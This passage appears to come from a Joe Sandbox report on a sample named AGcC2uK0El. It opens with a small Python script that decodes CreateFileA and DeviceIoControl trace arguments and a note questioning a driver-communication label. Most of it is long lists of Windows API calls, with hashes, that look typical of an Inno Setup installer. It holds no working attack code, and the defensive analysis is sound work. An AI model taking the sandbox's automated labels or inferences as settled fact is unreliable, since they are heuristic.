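        "share": set_bits(args[2], SHARE_MODES),
        "disposition": DISPOSITIONS.get(args[4], hex(args[4])),
        "flags": set_bits(args[5], FILE_FLAGS),
    }

# Trace line format as it appears in this report (assumption about the layout).
TRACE_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\)")

def parse_trace_line(line):
    """Parse 'Api.MODULE(arg,arg,...), ref: ...' into (api, module, [ints or None])."""
    m = TRACE_RE.search(line)
    if m is None:
        raise ValueError("not a trace line: " + line)
    # The sandbox prints unknown stack slots as '?'; keep them as None.
    args = [None if a.strip() == "?" else int(a, 16) for a in m.group(3).split(",")]
    return m.group(1), m.group(2), args

def decode_trace(lines):
    """Decode CreateFileA and DeviceIoControl entries; other APIs pass through undecoded."""
    out = []
    for line in lines:
        api, module, args = parse_trace_line(line)
        if api == "CreateFileA":
            out.append((api, decode_create_file(args)))
        elif api == "DeviceIoControl":
            # args[1] is dwIoControlCode, args[3] is nInBufferSize.
            out.append((api, dict(decode_ctl_code(args[1]), in_buffer_size=args[3])))
        else:
            out.append((api, None))
    return out

# Trace entries copied from the report's APIs list for this function.
SAMPLE_TRACE = [
    "CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA",
    "DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5",
]

if __name__ == "__main__":
    for api, info in decode_trace(SAMPLE_TRACE):
        print(api, info)
```

Running it over the two trace lines yields GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS for the open, and FSCTL_SET_COMPRESSION (device type FILE_DEVICE_FILE_SYSTEM, function 16, METHOD_BUFFERED, read/write access) with a 2-byte input buffer for the control call. A control code whose device type is FILE_DEVICE_FILE_SYSTEM is handled by the filesystem driver on an ordinary file handle; a code with an unknown device type, or a CreateFile on a \\.\ device path, is the pattern that actually warrants the driver-communication label.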
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00481CEE
                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                                    • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$IconicLong
                                                                                    • String ID:
                                                                                    • API String ID: 2754861897-0
                                                                                    • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                    • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                                    • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                                    • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                                    • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                    • String ID:
                                                                                    • API String ID: 3541575487-0
                                                                                    • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                    • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                                    • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                                    • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 004241F4
                                                                                    • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                                      • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                      • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021925AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                                    • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveFocusIconicShow
                                                                                    • String ID:
                                                                                    • API String ID: 649377781-0
                                                                                    • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                    • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                    • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                    • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 00417D1F
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Placement$Iconic
                                                                                    • String ID:
                                                                                    • API String ID: 568898626-0
                                                                                    • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                    • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                    • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                                    • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CaptureIconic
• String ID:
• API String ID: 2277910766-0
• Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
• Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
• Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
• Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
APIs
• IsIconic.USER32(?), ref: 004241AB
  • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
  • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
  • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
  • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
• SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
  • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Window$ActiveEnumIconicLongShowWindows
• String ID:
• API String ID: 2671590913-0
• Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
• Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
• Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
• Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
• Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
• Opcode Fuzzy Hash: b965a0132ad26a56d58156bb8aa5a4c51339e286f8ae4d564bc11b0873dfe01e
• Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 004776B6
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
• Instruction ID: 23eb90ac0865fb6649058132ab0dcd5e2738ee5152c03834e0ad15106694cca9
• Opcode Fuzzy Hash: 98c4159c357ba624018b5095eca27885fab0bd25fe2865ee120464a1d56055ca
• Instruction Fuzzy Hash: B4412775608505EFCB10CF9DC6808AABBF5FB48320BB5C996E848DB719D338EE419B54
APIs
• ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045C967
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
• Instruction ID: 196b54fe7aa8ab1053afe2cffafcf6ed6da51dc24599f2bb869cb02721a3a021
• Opcode Fuzzy Hash: 652ca7e95d520f478db864d31e1c50fd1cbe8d8ffee6081fd2562b398a9281da
• Instruction Fuzzy Hash: 7EC09BF240420CBF65005795FCC9C77F75CE65C6647408126F60442101D671AC1045B4
APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046CB48,?,0046CD29), ref: 0045C97A
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
• Instruction ID: f930510039fdc8c4d2d2d599ed284be9893e60875d5d975e013ee6f81a6adef0
• Opcode Fuzzy Hash: 94da5b28650a6231c2ea90e9e727fe7b396b15a16109e44d83a51c1f6f4de3e0
• Instruction Fuzzy Hash: E8A002B0E80300BAFD3057706E0EF37252CD7D4F01F208465B211A91D4C6A46404857C
Memory Dump Source
• Source File: 00000001.00000002.3301473306.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3301442669.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.3301494094.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_AGcC2uK0El.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
• Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
Memory Dump Source
• Source File: 00000001.00000002.3301473306.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.3301442669.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.3301494094.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_AGcC2uK0El.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
• Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction Fuzzy Hash:
APIs
• CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,00457875,?,?,?,00000001,?,00457A8F,00000000,00457AA5,?,00000000,0049A628), ref: 0045758D
• CreateFileMappingA.KERNEL32(000000FF,00498AE4,00000004,00000000,00002018,00000000), ref: 004575C5
• MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875,?,?,?), ref: 004575EC
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 004576F9
• ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045784B,?,00498AE4,00000001,00000000,00000000,00457875), ref: 00457651
  • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
• CloseHandle.KERNEL32(00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457710
• WaitForSingleObject.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457749
• GetLastError.KERNEL32(00000000,000000FF,00457A8F,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045775B
• UnmapViewOfFile.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045782D
• CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045783C
• CloseHandle.KERNEL32(00000000,00457852,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00457845
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
• String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
• API String ID: 4012871263-351310198
• Opcode ID: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
• Instruction ID: 9fa33364040fb067cffbf7544db289955a363cad08101e599f84dfab4c508334
• Opcode Fuzzy Hash: b8857b922522f3f755a45729126c2f0d9cd80f0de934d6ab31d5c47b9e38ba38
• Instruction Fuzzy Hash: D7916370A042059FDB10EBA9D845B9EB7B5EB08305F10857BE814EB383DB789948CF69
APIs
• GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
• SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
• LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
• SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
• GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
• GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
• GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
• GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
• GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
• GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
• GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
• GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
• GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
• FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
• String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
• API String ID: 2323315520-3614243559
• Opcode ID: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
• Instruction ID: cf5be9d6f1a649145535b6a7131e14805afeac8bde6fe10f2a473d18be96f611
• Opcode Fuzzy Hash: 51cb45610875762faf6d6cb9dc15dbb0f4a8b87cdd32b8fce74619213e256557
• Instruction Fuzzy Hash: D63110B1640700EBDF00EBF9AC86A653294F729724745093FB648DB192DB7E485ECB1D
APIs
• 73A0A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
• 73A14C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
• 73A16180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
• 73A14C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
• SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
• FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
• SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
• SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
• PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
• 73A14C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
• 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
• 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
• 73A08830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
• 73A022A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
• 73A14D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
• SelectObject.GDI32(00000000,?), ref: 0041CBFE
• DeleteDC.GDI32(00000000), ref: 0041CC14
  • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$ObjectSelect$A022A08830Text$A16180A570DeleteFillRect
                                                                                    • String ID:
                                                                                    • API String ID: 2377543522-0
                                                                                    • Opcode ID: aa3120a436c449d3c69836d856a65b18742abf0f47e61156e5e14d2e6b4a0b24
